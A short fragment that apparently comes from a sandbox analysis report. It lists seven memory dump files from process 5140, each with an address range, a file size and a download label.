memory/5140-110-0x000001D93A460000-0x000001D93A4D6000-memory.dmp

Filesize
472KB

Download
memory/5140-111-0x000001D93A1A0000-0x000001D93A1BE000-memory.dmp

Filesize
120KB

Download
memory/5140-138-0x000001D93A4E0000-0x000001D93A4F2000-memory.dmp

Filesize
72KB

Download
memory/5140-139-0x000001D93A440000-0x000001D93A44A000-memory.dmp

Filesize
40KB

Download
memory/5140-169-0x000001D939E00000-0x000001D939E10000-memory.dmp

Filesize
64KB

Download
memory/5140-105-0x00007FFD3E620000-0x00007FFD3F0E1000-memory.dmp

Filesize
10.8MB

Download
memory/5140-185-0x00007FFD3E620000-0x00007FFD3F0E1000-memory.dmp

Filesize
10.8MB

Download